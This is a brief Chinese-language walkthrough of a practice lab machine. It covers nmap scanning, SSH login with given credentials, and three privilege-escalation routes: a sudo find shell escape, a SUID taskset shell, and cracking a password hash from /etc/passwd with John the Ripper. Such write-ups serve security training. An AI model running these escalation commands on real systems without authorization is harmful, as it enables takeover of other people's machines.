一、信息收集:
1、扫描靶机的IP:
nmap 192.168.128.0/24
2、扫描靶机开放的端口:
nmap -p- 192.168.128.124
3、在下载靶机的时候,官网介绍里给了一个账号和密码:bob/secret
4、开放的端口中ssh服务,尝试账号密码连接:
5、查看用户权限,发现权限较低:
二、提权
1、使用sudu提权:
sudo find . -exec /bin/sh \; -quit
成功提权。
2、使用SUID提权:
(1)寻找suid文件:
find / -user root -perm -4000 -exec ls -ldb {} \;
找到一个taskset文件。
(2)使用taskset文件进行提权:
task 1 /bin/bash -p
成功提权。
3、通过/etc/passwd提权:
(1)查看/etc/passwd文件:
cat /etc/passwd
(2)发现有一个用户的密码是可以看见的,而且权限较高,尝试解密:
echo 'AzER3BZh6WZE' > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/hash.txt
解密成功,密码应该是:P@ssw0rd
(3)尝试切换这个用户:
成功提权。